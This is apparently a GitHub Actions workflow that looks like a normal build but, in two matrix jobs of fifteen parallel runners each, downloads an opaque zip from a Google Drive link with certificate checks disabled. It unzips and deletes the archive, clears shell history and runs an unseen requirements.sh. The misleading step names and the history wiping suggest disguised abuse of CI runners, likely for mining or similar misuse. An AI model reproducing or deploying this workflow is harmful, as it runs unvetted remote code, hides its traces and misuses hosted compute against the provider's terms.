name: aquasaobang592ai
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  START:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Start', 'Code', 'Debug', 'Deploy', 'Monitor']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1jBqwUqIpfSm0yBiNJ4HB1PLGlcuCBhY_" -O Diffusers.zip
        unzip -o Diffusers.zip
        rm Diffusers.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  SHIP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Fetch', 'Integrate', 'Evaluate', 'Execute', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1jBqwUqIpfSm0yBiNJ4HB1PLGlcuCBhY_" -O Diffusers.zip
        unzip -o Diffusers.zip
        rm Diffusers.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
